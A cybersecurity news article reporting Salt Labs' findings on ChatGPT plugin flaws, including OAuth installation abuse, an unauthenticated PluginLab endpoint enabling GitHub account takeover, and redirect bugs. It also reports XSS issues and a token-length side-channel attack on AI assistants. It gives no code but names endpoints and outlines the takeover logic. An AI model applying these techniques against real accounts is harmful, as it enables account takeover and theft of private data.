HomeCyberSecurity NewsAccount Takeovers may result from Third-Party ChatGPT Plugins

Account Takeovers may result from Third-Party ChatGPT Plugins

Cybersecurity researchers have discovered that third-party plugins for OpenAI ChatGPT could create a new attack vector for hackers seeking unauthorized access to sensitive information.

As per recent research by Salt Labs, vulnerabilities within ChatGPT and its ecosystem could enable attackers to install malicious plugins without user consent and compromise accounts on third-party platforms like GitHub.

ChatGPT plugins are tools designed to enhance the functionality of the large language model (LLM) by accessing real-time information, performing computations, or integrating with third-party services.

OpenAI has also introduced GPTs, customized versions of ChatGPT for specific purposes, reducing reliance on third-party services. Starting March 19, 2024, ChatGPT users will no longer be able to create new conversations with existing plugins or install new ones.

One identified vulnerability involves exploiting the OAuth workflow to deceive users into installing unauthorized plugins, leveraging ChatGPT’s lack of validation during the installation process. This could potentially allow threat actors to intercept and extract sensitive data, including proprietary information.

Additionally, Salt Labs found issues with PluginLab that could be used by hackers to perform zero-click account takeovers, compromising an organization’s accounts on platforms like GitHub and accessing source code repositories.

“[The endpoint] ‘auth.pluginlab[.]ai/oauth/authorized’ doesn’t authenticate the request, allowing the attacker to insert a different memberId (or the victim) to access the victim’s GitHub,” explained security researcher Aviad Carmel.

The victim’s memberId can be acquired by querying the endpoint “auth.pluginlab[.]ai/members/requestMagicEmailCode,” with no reported compromise of user data through this flaw.

Furthermore, several plugins, including Kesem AI, were found to contain an OAuth redirection manipulation bug that could enable attackers to steal credentials associated with the plugin by sending specially crafted links to victims.

These revelations come on the heels of Imperva’s disclosure of two cross-site scripting (XSS) vulnerabilities in ChatGPT that, when combined, could lead to unauthorized account access.

In late 2023, researcher Johann Rehberger demonstrated how malicious actors could create custom GPTs to extract user credentials and transmit the stolen data externally.

New Remote Keylogging Attack on AI Assistants

Recent research has also highlighted an LLM side-channel attack that leverages token-length as a covert method to extract encrypted responses from AI Assistants over the internet.

“LLMs produce responses as a series of tokens, with each token transmitted as it’s generated. Despite encryption, the sequential transmission exposes a new side-channel: the token-length side-channel. This can allow attackers to infer sensitive information shared during private AI assistant conversations,” explained academics from Ben-Gurion University and Offensive AI Research Lab.

This token inference attack aims to decipher encrypted responses by training an LLM model to translate token-length sequences into plaintext, enabling attackers to glean confidential information shared in real-time chats with AI assistants.

To mitigate this side-channel attack, it’s advised that AI assistant developers implement random padding, transmit tokens in larger groups, and send complete responses at once to obscure the length of tokens, balancing security with usability and performance.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest News